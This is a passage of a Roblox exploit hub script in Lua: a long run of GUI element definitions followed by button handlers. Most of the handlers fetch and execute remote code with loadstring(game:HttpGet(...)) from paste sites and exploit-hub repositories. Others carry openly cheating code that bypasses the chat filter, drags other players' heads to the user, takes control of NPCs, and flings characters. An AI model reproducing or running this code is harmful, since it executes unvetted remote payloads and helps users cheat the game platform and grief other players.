		Empty_5.Name = "Empty"
		Empty_5.Parent = GearTools
		Empty_5.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Empty_5.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Empty_5.BorderSizePixel = 3
		Empty_5.Position = UDim2.new(0.5, 3, 0.10204082, 198)
		Empty_5.Size = UDim2.new(0.5, -3, 0, 30)
		Empty_5.ZIndex = 2
		Empty_5.Font = Enum.Font.SourceSans
		Empty_5.Text = "Empty"
		Empty_5.TextColor3 = Color3.fromRGB(255, 255, 255)
		Empty_5.TextSize = 14.000
	
		Empty_6.Name = "Empty"
		Empty_6.Parent = GearTools
		Empty_6.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Empty_6.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Empty_6.BorderSizePixel = 3
		Empty_6.Position = UDim2.new(0, 0, 0, 228)
		Empty_6.Size = UDim2.new(0.499000013, 0, 0, 30)
		Empty_6.ZIndex = 3
		Empty_6.Font = Enum.Font.SourceSans
		Empty_6.Text = "Empty"
		Empty_6.TextColor3 = Color3.fromRGB(255, 255, 255)
		Empty_6.TextSize = 14.000
		Empty_6.TextWrapped = true
	
		WeaponScripts.Name = "Weapon Scripts"
		WeaponScripts.Parent = Page2
		WeaponScripts.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		WeaponScripts.BorderColor3 = Color3.fromRGB(255, 0, 0)
		WeaponScripts.BorderSizePixel = 3
		WeaponScripts.Size = UDim2.new(0.5, -3, 1, 0)
		WeaponScripts.ZIndex = 2
	
		ElioBlasio.Name = "Elio Blasio"
		ElioBlasio.Parent = WeaponScripts
		ElioBlasio.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		ElioBlasio.BorderColor3 = Color3.fromRGB(255, 0, 0)
		ElioBlasio.BorderSizePixel = 3
		ElioBlasio.Position = UDim2.new(0, 0, 0, 33)
		ElioBlasio.Size = UDim2.new(0.5, 0, 0, 30)
		ElioBlasio.ZIndex = 2
		ElioBlasio.Font = Enum.Font.SourceSans
		ElioBlasio.Text = "Elio Blasio"
		ElioBlasio.TextColor3 = Color3.fromRGB(255, 255, 255)
		ElioBlasio.TextSize = 14.000
	
		TrueSSHub.Name = "True SS Hub"
		TrueSSHub.Parent = WeaponScripts
		TrueSSHub.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		TrueSSHub.BorderColor3 = Color3.fromRGB(255, 0, 0)
		TrueSSHub.BorderSizePixel = 3
		TrueSSHub.Position = UDim2.new(0.5, 3, 0, 33)
		TrueSSHub.Size = UDim2.new(0.5, -3, 0, 30)
		TrueSSHub.ZIndex = 2
		TrueSSHub.Font = Enum.Font.SourceSans
		TrueSSHub.Text = "True SS Hub"
		TrueSSHub.TextColor3 = Color3.fromRGB(255, 255, 255)
		TrueSSHub.TextSize = 14.000
		TrueSSHub.TextWrapped = true
	
		Sledgehammer.Name = "Sledgehammer"
		Sledgehammer.Parent = WeaponScripts
		Sledgehammer.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Sledgehammer.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Sledgehammer.BorderSizePixel = 3
		Sledgehammer.Position = UDim2.new(0, 0, 0, 66)
		Sledgehammer.Size = UDim2.new(0.5, 0, 0, 30)
		Sledgehammer.ZIndex = 2
		Sledgehammer.Font = Enum.Font.SourceSans
		Sledgehammer.Text = "Sledge Hammer"
		Sledgehammer.TextColor3 = Color3.fromRGB(255, 255, 255)
		Sledgehammer.TextSize = 14.000
		Sledgehammer.TextWrapped = true
	
		SwatBanisher.Name = "Swat Banisher"
		SwatBanisher.Parent = WeaponScripts
		SwatBanisher.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		SwatBanisher.BorderColor3 = Color3.fromRGB(255, 0, 0)
		SwatBanisher.BorderSizePixel = 3
		SwatBanisher.Position = UDim2.new(0.5, 3, 0, 66)
		SwatBanisher.Size = UDim2.new(0.5, -3, 0, 30)
		SwatBanisher.ZIndex = 2
		SwatBanisher.Font = Enum.Font.SourceSans
		SwatBanisher.Text = "SWAT Banisher"
		SwatBanisher.TextColor3 = Color3.fromRGB(255, 255, 255)
		SwatBanisher.TextSize = 14.000
		SwatBanisher.TextWrapped = true
	
		NullwareHub.Name = "Nullware Hub"
		NullwareHub.Parent = WeaponScripts
		NullwareHub.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		NullwareHub.BorderColor3 = Color3.fromRGB(255, 0, 0)
		NullwareHub.BorderSizePixel = 3
		NullwareHub.Position = UDim2.new(0, 0, 0, 99)
		NullwareHub.Size = UDim2.new(0.499000013, 0, 0, 30)
		NullwareHub.ZIndex = 2
		NullwareHub.Font = Enum.Font.SourceSans
		NullwareHub.Text = "Nullware Hub"
		NullwareHub.TextColor3 = Color3.fromRGB(255, 255, 255)
		NullwareHub.TextSize = 14.000
		NullwareHub.TextWrapped = true
	
		PunchScript.Name = "Punch Script"
		PunchScript.Parent = WeaponScripts
		PunchScript.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		PunchScript.BorderColor3 = Color3.fromRGB(255, 0, 0)
		PunchScript.BorderSizePixel = 3
		PunchScript.Position = UDim2.new(0.5, 3, 0, 99)
		PunchScript.Size = UDim2.new(0.5, -3, 0, 30)
		PunchScript.ZIndex = 2
		PunchScript.Font = Enum.Font.SourceSans
		PunchScript.Text = "Punch Script"
		PunchScript.TextColor3 = Color3.fromRGB(255, 255, 255)
		PunchScript.TextSize = 14.000
	
		_500PoundsBall.Name = "500 Pounds Ball"
		_500PoundsBall.Parent = WeaponScripts
		_500PoundsBall.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		_500PoundsBall.BorderColor3 = Color3.fromRGB(255, 0, 0)
		_500PoundsBall.BorderSizePixel = 3
		_500PoundsBall.Position = UDim2.new(0, 0, 0, 132)
		_500PoundsBall.Size = UDim2.new(0.499000013, 0, 0, 30)
		_500PoundsBall.ZIndex = 2
		_500PoundsBall.Font = Enum.Font.SourceSans
		_500PoundsBall.Text = "500 Pounds Ball"
		_500PoundsBall.TextColor3 = Color3.fromRGB(255, 255, 255)
		_500PoundsBall.TextSize = 14.000
		_500PoundsBall.TextWrapped = true
	
		GKV3.Name = "GKV3"
		GKV3.Parent = WeaponScripts
		GKV3.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		GKV3.BorderColor3 = Color3.fromRGB(255, 0, 0)
		GKV3.BorderSizePixel = 3
		GKV3.Position = UDim2.new(0.5, 3, 0, 132)
		GKV3.Size = UDim2.new(0.5, -3, 0, 30)
		GKV3.ZIndex = 2
		GKV3.Font = Enum.Font.SourceSans
		GKV3.Text = "Grab Knife V3"
		GKV3.TextColor3 = Color3.fromRGB(255, 255, 255)
		GKV3.TextSize = 14.000
		GKV3.TextWrapped = true
	
		GrabKnifeV4.Name = "Grab Knife V4"
		GrabKnifeV4.Parent = WeaponScripts
		GrabKnifeV4.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		GrabKnifeV4.BorderColor3 = Color3.fromRGB(255, 0, 0)
		GrabKnifeV4.BorderSizePixel = 3
		GrabKnifeV4.Position = UDim2.new(0, 0, 0, 165)
		GrabKnifeV4.Size = UDim2.new(0.5, 0, 0, 30)
		GrabKnifeV4.ZIndex = 2
		GrabKnifeV4.Font = Enum.Font.SourceSans
		GrabKnifeV4.Text = "Grab Knife V4"
		GrabKnifeV4.TextColor3 = Color3.fromRGB(255, 255, 255)
		GrabKnifeV4.TextSize = 14.000
	
		GermanSoldier.Name = "German Soldier"
		GermanSoldier.Parent = WeaponScripts
		GermanSoldier.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		GermanSoldier.BorderColor3 = Color3.fromRGB(255, 0, 0)
		GermanSoldier.BorderSizePixel = 3
		GermanSoldier.Position = UDim2.new(0.5, 3, 0, 165)
		GermanSoldier.Size = UDim2.new(0.5, -3, 0, 30)
		GermanSoldier.ZIndex = 2
		GermanSoldier.Font = Enum.Font.SourceSans
		GermanSoldier.Text = "German Sol"
		GermanSoldier.TextColor3 = Color3.fromRGB(255, 255, 255)
		GermanSoldier.TextSize = 14.000
	
		Empty_7.Name = "Empty"
		Empty_7.Parent = WeaponScripts
		Empty_7.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Empty_7.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Empty_7.BorderSizePixel = 3
		Empty_7.Position = UDim2.new(0, 0, 0, 198)
		Empty_7.Size = UDim2.new(0.5, 0, 0, 30)
		Empty_7.ZIndex = 2
		Empty_7.Font = Enum.Font.SourceSans
		Empty_7.Text = "Empty"
		Empty_7.TextColor3 = Color3.fromRGB(255, 255, 255)
		Empty_7.TextSize = 14.000
		Empty_7.TextWrapped = true
	
		Empty_8.Name = "Empty"
		Empty_8.Parent = WeaponScripts
		Empty_8.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Empty_8.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Empty_8.BorderSizePixel = 3
		Empty_8.Position = UDim2.new(0.5, 3, 0, 198)
		Empty_8.Size = UDim2.new(0.479999989, 0, 0, 30)
		Empty_8.ZIndex = 2
		Empty_8.Font = Enum.Font.SourceSans
		Empty_8.Text = "Empty"
		Empty_8.TextColor3 = Color3.fromRGB(255, 255, 255)
		Empty_8.TextSize = 14.000
		Empty_8.TextWrapped = true
	
		Empty_9.Name = "Empty"
		Empty_9.Parent = WeaponScripts
		Empty_9.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Empty_9.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Empty_9.BorderSizePixel = 3
		Empty_9.Position = UDim2.new(0, 0, 0, 228)
		Empty_9.Size = UDim2.new(0.5, 0, 0, 30)
		Empty_9.ZIndex = 2
		Empty_9.Font = Enum.Font.SourceSans
		Empty_9.Text = "Empty"
		Empty_9.TextColor3 = Color3.fromRGB(255, 255, 255)
		Empty_9.TextSize = 14.000
		Empty_9.TextWrapped = true
	
		Empty_10.Name = "Empty"
		Empty_10.Parent = WeaponScripts
		Empty_10.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Empty_10.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Empty_10.BorderSizePixel = 3
		Empty_10.Position = UDim2.new(0.5, 3, -0.0102040814, 231)
		Empty_10.Size = UDim2.new(0.5, -3, 0, 30)
		Empty_10.ZIndex = 2
		Empty_10.Font = Enum.Font.SourceSans
		Empty_10.Text = "Empty"
		Empty_10.TextColor3 = Color3.fromRGB(255, 255, 255)
		Empty_10.TextSize = 14.000
		Empty_10.TextWrapped = true
	
		Title_14.Name = "Title"
		Title_14.Parent = WeaponScripts
		Title_14.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_14.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_14.BorderSizePixel = 3
		Title_14.Size = UDim2.new(1, 0, 0, 30)
		Title_14.ZIndex = 2
		Title_14.Font = Enum.Font.SourceSansBold
		Title_14.Text = "Weapon Scripts/Hubs"
		Title_14.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_14.TextSize = 14.000
	
		Title_15.Name = "Title"
		Title_15.Parent = Page2
		Title_15.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title_15.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title_15.BorderSizePixel = 3
		Title_15.Position = UDim2.new(-0.0011353048, 0, 0.897656918, 0)
		Title_15.Size = UDim2.new(1.00113535, 0, 0, 30)
		Title_15.ZIndex = 2
		Title_15.Font = Enum.Font.SourceSansBold
		Title_15.Text = "Page 2"
		Title_15.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title_15.TextSize = 14.000
	
		cool.Name = "cool"
		cool.Parent = Frame
		cool.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
		cool.BackgroundTransparency = 1.000
		cool.Position = UDim2.new(1.00999999, 0, 0, 0)
		cool.Size = UDim2.new(0, 45, 0, 400)
		cool.Visible = false
	
		idk_2.Name = "idk"
		idk_2.Parent = cool
		idk_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		idk_2.BorderColor3 = Color3.fromRGB(255, 0, 0)
		idk_2.BorderSizePixel = 3
		idk_2.Position = UDim2.new(-0.078332521, 3, -0.949999988, 380)
		idk_2.Size = UDim2.new(0, 26, 0, 400)
		idk_2.ZIndex = 3
		idk_2.Font = Enum.Font.SourceSans
		idk_2.Text = ">"
		idk_2.TextColor3 = Color3.fromRGB(65025, 65025, 65025)
		idk_2.TextSize = 50.000
	
		CloseOpen.Name = "Close/Open"
		CloseOpen.Parent = culgui
		CloseOpen.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		CloseOpen.BorderColor3 = Color3.fromRGB(255, 0, 0)
		CloseOpen.BorderSizePixel = 3
		CloseOpen.Position = UDim2.new(0, 3, 0.300000012, 380)
		CloseOpen.Size = UDim2.new(0, 300, 0, 20)
		CloseOpen.ZIndex = 3
		CloseOpen.Font = Enum.Font.SourceSans
		CloseOpen.Text = "Close/Open"
		CloseOpen.TextColor3 = Color3.fromRGB(65025, 65025, 65025)
		CloseOpen.TextSize = 18.000
	
		-- Scripts:
	
		local function BNVTJKQ_fake_script() -- Harked.LocalScript 
			local script = Instance.new('LocalScript', Harked)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://www.klgrth.io/paste/q8pr8/raw", true))()
			end)
		end
		coroutine.wrap(BNVTJKQ_fake_script)()
		local function PAMT_fake_script() -- ProjectLigma.LocalScript 
			local script = Instance.new('LocalScript', ProjectLigma)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://www.klgrth.io/paste/2kb69/raw", true))()
			end)
		end
		coroutine.wrap(PAMT_fake_script)()
		local function JGFJ_fake_script() -- T0PK3K.LocalScript 
			local script = Instance.new('LocalScript', T0PK3K)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://www.klgrth.io/paste/funvv/raw", true))()
			end)
		end
		coroutine.wrap(JGFJ_fake_script)()
		local function PZXV_fake_script() -- ByteGui.LocalScript 
			local script = Instance.new('LocalScript', ByteGui)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/a4zqx/raw'),true))()
			end)
		end
		coroutine.wrap(PZXV_fake_script)()
		local function QSZQXI_fake_script() -- RevizAdminV3.LocalScript 
			local script = Instance.new('LocalScript', RevizAdminV3)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/a44n9/raw'),true))()
			end)
		end
		coroutine.wrap(QSZQXI_fake_script)()
		local function QSRVMJT_fake_script() -- InfiniteYield.LocalScript 
			local script = Instance.new('LocalScript', InfiniteYield)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
			end)
		end
		coroutine.wrap(QSRVMJT_fake_script)()
		local function AUOYGO_fake_script() -- FatesAdmin.LocalScript 
			local script = Instance.new('LocalScript', FatesAdmin)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://raw.githubusercontent.com/fatesc/fates-admin/main/main.lua"))();
			end)
		end
		coroutine.wrap(AUOYGO_fake_script)()
		local function OHTHX_fake_script() -- UnanchoredGui.LocalScript 
			local script = Instance.new('LocalScript', UnanchoredGui)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://pastebin.com/raw/WkZwcGjf", true))()
			end)
		end
		coroutine.wrap(OHTHX_fake_script)()
		local function RBBTHT_fake_script() -- ChatHaxx.LocalScript 
			local script = Instance.new('LocalScript', ChatHaxx)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet('https://raw.githubusercontent.com/ant-7802/--/main/straightmilk.lua'))()
			end)
		end
		coroutine.wrap(RBBTHT_fake_script)()
		local function WTXDV_fake_script() -- PendulumHub.LocalScript 
			local script = Instance.new('LocalScript', PendulumHub)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://raw.githubusercontent.com/Tescalus/Pendulum-Hubs-Source/main/Pendulum%20Hub%20V5.lua"))()
			end)
		end
		coroutine.wrap(WTXDV_fake_script)()
		local function VLKBS_fake_script() -- Hydroxide.LocalScript 
			local script = Instance.new('LocalScript', Hydroxide)
	
			script.Parent.MouseButton1Click:Connect(function()
				local owner = "Upbolt"
				local branch = "revision"
	
				local function webImport(file)
					return loadstring(game:HttpGetAsync(("https://raw.githubusercontent.com/%s/Hydroxide/%s/%s.lua"):format(owner, branch, file)), file .. '.lua')()
				end
	
				webImport("init")
			end)
		end
		coroutine.wrap(VLKBS_fake_script)()
		local function KSKI_fake_script() -- Opfinality.LocalScript 
			local script = Instance.new('LocalScript', Opfinality)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet('https://pastebin.com/raw/cdWKjwj8'))()
			end)
		end
		coroutine.wrap(KSKI_fake_script)()
		local function EFJXE_fake_script() -- Homebrewadmin.LocalScript 
			local script = Instance.new('LocalScript', Homebrewadmin)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/Syntaxx64/HomebrewAdmin/master/Main"))()
			end)
		end
		coroutine.wrap(EFJXE_fake_script)()
		local function KVPUREO_fake_script() -- CMDX.LocalScript 
			local script = Instance.new('LocalScript', CMDX)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://raw.githubusercontent.com/CMD-X/CMD-X/master/Source",true))()
			end)
		end
		coroutine.wrap(KVPUREO_fake_script)()
		local function CRJWN_fake_script() -- Bringallplayersheads.LocalScript 
			local script = Instance.new('LocalScript', Bringallplayersheads)
	
			script.Parent.MouseButton1Click:Connect(function()
				while true do
					local LP = game:GetService("Players").LocalPlayer
					for i,v in pairs(game:GetService("Players"):GetPlayers()) do
						if v and v.Character and v ~= LP and v.Character:FindFirstChild("Head") then
							local hrp = v.Character:FindFirstChild("Head") --// I thought of using humanoidrootpart first but it works better with the head!
							hrp:BreakJoints()
							hrp.Transparency = 0
							hrp.BrickColor = v.TeamColor
							hrp.Anchored = true
							hrp.CanCollide = false
							pcall(function()
								hrp.CFrame = LP.Character.HumanoidRootPart.CFrame * CFrame.new(1,0,-3.5)
							end)
						end
					end
					wait(1)
				end
			end)
		end
		coroutine.wrap(CRJWN_fake_script)()
		local function CUOPZ_fake_script() -- singc00lkiddtheme.LocalScript 
			local script = Instance.new('LocalScript', singc00lkiddtheme)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://www.klgrth.io/paste/xanxn/raw", true))()
			end)
		end
		coroutine.wrap(CUOPZ_fake_script)()
		local function WHKEJRE_fake_script() -- Platform.LocalScript 
			local script = Instance.new('LocalScript', Platform)
	
			script.Parent.MouseButton1Click:Connect(function()
				local name = game.Players.LocalPlayer.Name
	
				local p = Instance.new("Part")
				p.Parent = workspace
				p.Locked = true
				p.BrickColor = BrickColor.new("White")
				p.BrickColor = BrickColor.new(104)
				p.Size = Vector3.new(30.697, 1, 33.698)
				p.Anchored = true
				local m = Instance.new("CylinderMesh")
				m.Scale = Vector3.new(1, 0.5, 1)
				m.Parent = p
				p.CFrame = CFrame.new(game.Players:findFirstChild(name).Character.Torso.CFrame.x, game.Players:findFirstChild(name).Character.Torso.CFrame.y - 4, game.Players:findFirstChild(name).Character.Torso.CFrame.z)
			end)
		end
		coroutine.wrap(WHKEJRE_fake_script)()
		local function XDWC_fake_script() -- HeadFling.LocalScript 
			local script = Instance.new('LocalScript', HeadFling)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://pastebin.com/raw/BK4Q0DfU"))()
			end)
		end
		coroutine.wrap(XDWC_fake_script)()
		local function LEDPQ_fake_script() -- ChatBypass.LocalScript 
			local script = Instance.new('LocalScript', ChatBypass)
	
			script.Parent.MouseButton1Click:Connect(function()
				getgenv().method = "fn" -- put the two letters (method) here. available ones are pq, bj, dq and hu. fn is recommended by default.
				loadstring(game:HttpGet("https://raw.githubusercontent.com/daddysyn/synergy/additional/betterbypasser",true))()
			end)
		end
		coroutine.wrap(LEDPQ_fake_script)()
		local function MQGF_fake_script() -- FloatingPad.LocalScript 
			local script = Instance.new('LocalScript', FloatingPad)
	
			script.Parent.MouseButton1Click:Connect(function()
				local name = game.Players.LocalPlayer.Name
	
				local p = Instance.new("Part")
				p.Parent = workspace
				p.Locked = true
				p.BrickColor = BrickColor.new("White")
				p.BrickColor = BrickColor.new(104)
				p.Size = Vector3.new(8, 1.2, 8)
				p.Anchored = true
				local m = Instance.new("CylinderMesh")
				m.Scale = Vector3.new(1, 0.5, 1)
				m.Parent = p
				while true do
					p.CFrame = CFrame.new(game.Players:findFirstChild(name).Character.Torso.CFrame.x, game.Players:findFirstChild(name).Character.Torso.CFrame.y - 4, game.Players:findFirstChild(name).Character.Torso.CFrame.z)
					wait()
				end
			end)
		end
		coroutine.wrap(MQGF_fake_script)()
		local function KWKDG_fake_script() -- HeadShake.LocalScript 
			local script = Instance.new('LocalScript', HeadShake)
	
			script.Parent.MouseButton1Click:Connect(function()
				for X = 1, math.huge, 0.2 do 
					wait() 
					game.Workspace[game.Players.LocalPlayer.Name].Torso.Neck.C0 = CFrame.new(math.sin(X) / 1,1.5,0) 
					game.Workspace[game.Players.LocalPlayer.Name].Torso.Neck.C1 = CFrame.new(0,0,0) 
				end 
				for X = 1, math.huge, 0.1 do 
					wait() 
					game.Workspace[game.Players.LocalPlayer.Name].Torso.Neck.C0 = CFrame.new(0,1.5,0) * CFrame.fromAxisAngle(Vector3.new(0,1,0), X) 
					game.Workspace[game.Players.LocalPlayer.Name].Torso.Neck.C1 = CFrame.new(0,0,0) 
				end 
				for _,c in pairs(game.Players:GetChildren()) do
					c.Character.Head.Mesh.Scale = Vector3.new(100, 100, 100)
				end
				for _,c in pairs(game.Players:GetChildren()) do
					c.Character.Head.Mesh.Scale = Vector3.new(1.25, 1.25, 1.25)
				end
			end)
		end
		coroutine.wrap(KWKDG_fake_script)()
		local function VRLCXE_fake_script() -- NameTag.LocalScript 
			local script = Instance.new('LocalScript', NameTag)
	
			script.Parent.MouseButton1Click:Connect(function()
				if game.Players.LocalPlayer.Character.Head:FindFirstChild("BillboardGui") then
					game.Players.LocalPlayer.Character.Head:FindFirstChild("BillboardGui"):Remove()	
				end
				plr = game.Players.LocalPlayer.Name
				y = Instance.new("BillboardGui")
				y.Size = UDim2.new(0,100,0,150)
				y.StudsOffset = Vector3.new(0,1,0)
				y.Parent = game.Players[plr].Character.Head
				y.Adornee = game.Players[plr].Character.Head
				f = Instance.new("TextLabel")
				f.Parent = y
				f.BackgroundTransparency = 1
				f.Position = UDim2.new(0,0,0,-50)
				f.Size = UDim2.new(0,100,0,100)
				f.Font = "Arial"
				f.FontSize = "Size48"
				f.Text = "c00lkidd"
				f.TextStrokeColor3 = Color3.new(0,0,0)
				f.TextColor3 = Color3.new(1, 0, 0)
				f.TextStrokeTransparency = 0
				f.TextYAlignment = "Bottom" 
			end)
		end
		coroutine.wrap(VRLCXE_fake_script)()
		local function CPLVCTQ_fake_script() -- ControlNPCs.LocalScript 
			local script = Instance.new('LocalScript', ControlNPCs)
	
			script.Parent.MouseButton1Click:Connect(function()
				-- Variables
				local mouse = game.Players.LocalPlayer:GetMouse()
				local uis = game:GetService("UserInputService")
	
				-- Connect
				mouse.Button1Down:Connect(function()
					-- Check for Target & Left Shift
					if mouse.Target and uis:IsKeyDown(Enum.KeyCode.LeftControl) then
						local npc = mouse.target.Parent
						local npcRootPart = npc.HumanoidRootPart
						local PlayerCharacter = game:GetService("Players").LocalPlayer.Character
						local PlayerRootPart = PlayerCharacter.HumanoidRootPart
						local A0 = Instance.new("Attachment")
						local AP = Instance.new("AlignPosition")
						local AO = Instance.new("AlignOrientation")
						local A1 = Instance.new("Attachment")
						for _, v in pairs(npc:GetDescendants()) do
							if v:IsA("BasePart") then
								game:GetService("RunService").Stepped:Connect(function()
									v.CanCollide = false
								end)
							end
						end
						PlayerRootPart:BreakJoints()
						for _, v in pairs(PlayerCharacter:GetDescendants()) do
							if v:IsA("BasePart") then
								if v.Name == "HumanoidRootPart" or v.Name == "UpperTorso" or v.Name == "Head" then
								else
									v:Destroy()
								end
							end
						end
						PlayerRootPart.Position = PlayerRootPart.Position+Vector3.new(5, 0, 0)
						PlayerCharacter.Head.Anchored = true
						PlayerCharacter.UpperTorso.Anchored = true
						A0.Parent = npcRootPart
						AP.Parent = npcRootPart
						AO.Parent = npcRootPart
						AP.Responsiveness = 200
						AP.MaxForce = math.huge
						AO.MaxTorque = math.huge
						AO.Responsiveness = 200
						AP.Attachment0 = A0
						AP.Attachment1 = A1
						AO.Attachment1 = A1
						AO.Attachment0 = A0
						A1.Parent = PlayerRootPart
					end
				end)
			end)
		end
		coroutine.wrap(CPLVCTQ_fake_script)()
		local function YBPILG_fake_script() -- Getallitems.LocalScript 
			local script = Instance.new('LocalScript', Getallitems)
	
			script.Parent.MouseButton1Click:Connect(function()
				local p = game:GetService("Players").LocalPlayer
				local c = p.Character
				if c and c:FindFirstChild("Humanoid") then
					for i,v in pairs(game:GetService("Workspace"):GetDescendants()) do
						if v:IsA("Tool") then
							c:FindFirstChild("Humanoid"):EquipTool(v)
						end
					end
				end
			end)
		end
		coroutine.wrap(YBPILG_fake_script)()
		local function TYCSRS_fake_script() -- Blackhole.LocalScript 
			local script = Instance.new('LocalScript', Blackhole)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://pastebin.com/raw/Ug5aA1QL"))();
			end)
		end
		coroutine.wrap(TYCSRS_fake_script)()
		local function MZKX_fake_script() -- WalkOnWalls.LocalScript 
			local script = Instance.new('LocalScript', WalkOnWalls)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://pastebin.com/raw/H4c2LpFF"))();
			end)
		end
		coroutine.wrap(MZKX_fake_script)()
		local function ZZYGMRY_fake_script() -- SCP173.LocalScript 
			local script = Instance.new('LocalScript', SCP173)
	
			script.Parent.MouseButton1Click:Connect(function()
				_G.KeyCode = "X"
				loadstring(game:HttpGet("https://shattered-gang.lol/scripts/fe/fe_scp_173.lua"))()
			end)
		end
		coroutine.wrap(ZZYGMRY_fake_script)()
		local function BSTP_fake_script() -- SCP106.LocalScript 
			local script = Instance.new('LocalScript', SCP106)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://www.klgrth.io/paste/hm4xn/raw"))();
			end)
		end
		coroutine.wrap(BSTP_fake_script)()
		local function SGLPNP_fake_script() -- TextButton.LocalScript 
			local script = Instance.new('LocalScript', TextButton)
	
			script.Parent.MouseButton1Click:Connect(function(Speed)
				game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = script.Parent.Parent.TextBox.Text
			end)
		end
		coroutine.wrap(SGLPNP_fake_script)()
		local function YIDVEA_fake_script() -- TextButton_2.LocalScript 
			local script = Instance.new('LocalScript', TextButton_2)
	
			script.Parent.MouseButton1Click:Connect(function()
				local Cam = workspace.CurrentCamera
				local Pos, Char = Cam.CFrame, speaker.Character
				local Human = Char and Char.FindFirstChildWhichIsA(Char, "Humanoid")
				local nHuman = Human.Clone(Human)
				nHuman.Parent, speaker.Character = Char, nil
				nHuman.SetStateEnabled(nHuman, 15, false)
				nHuman.SetStateEnabled(nHuman, 1, false)
				nHuman.SetStateEnabled(nHuman, 0, false)
				nHuman.BreakJointsOnDeath, Human = true, Human.Destroy(Human)
				speaker.Character, Cam.CameraSubject, Cam.CFrame = Char, nHuman, wait() and Pos
				nHuman.DisplayDistanceType = Enum.HumanoidDisplayDistanceType.None
				local Script = Char.FindFirstChild(Char, "Animate")
				if Script then
					Script.Disabled = true
					wait()
					Script.Disabled = false
				end
				nHuman.Health = nHuman.MaxHealth
			end)
		end
		coroutine.wrap(YIDVEA_fake_script)()
		local function AGUPDV_fake_script() -- TextButton_3.LocalScript 
			local script = Instance.new('LocalScript', TextButton_3)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://www.klgrth.io/paste/2kh42/raw", true))()
			end)
		end
		coroutine.wrap(AGUPDV_fake_script)()
		local function LKYL_fake_script() -- TextButton_4.LocalScript 
			local script = Instance.new('LocalScript', TextButton_4)
	
			script.Parent.MouseButton1Click:Connect(function(Speed)
				game.Players.LocalPlayer.Character.Humanoid.JumpPower = script.Parent.Parent.TextBox.Text
			end)
		end
		coroutine.wrap(LKYL_fake_script)()
		local function MAEZS_fake_script() -- TextButton_5.LocalScript 
			local script = Instance.new('LocalScript', TextButton_5)
	
			script.Parent.MouseButton1Click:Connect(function()
				for i,v in next, game:GetService("Players").LocalPlayer.Character:GetDescendants() do
					if v:IsA("BasePart") and v.Name ~="HumanoidRootPart" then 
						game:GetService("RunService").Heartbeat:connect(function()
							v.Velocity = Vector3.new(0,35,0)
							wait(0.5)
						end)
					end
				end
	
				game:GetService("StarterGui"):SetCore("SendNotification", { 
					Title = "Notification";
					Text = "Netless activated";
					Icon = "rbxthumb://type=Asset&id=5107182114&w=150&h=150"})
				Duration = 16;
			end)
		end
		coroutine.wrap(MAEZS_fake_script)()
		local function EIQGJKZ_fake_script() -- TextButton_6.LocalScript 
			local script = Instance.new('LocalScript', TextButton_6)
	
			script.Parent.MouseButton1Click:Connect(function()
				script.Parent.Parent.Parent.Parent.Parent.Visible = false
				script.Parent.Parent.Parent.Parent.Parent.Parent["Close/Open"].Visible = false
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/kfm56/raw'),true))()
			end)
		end
		coroutine.wrap(EIQGJKZ_fake_script)()
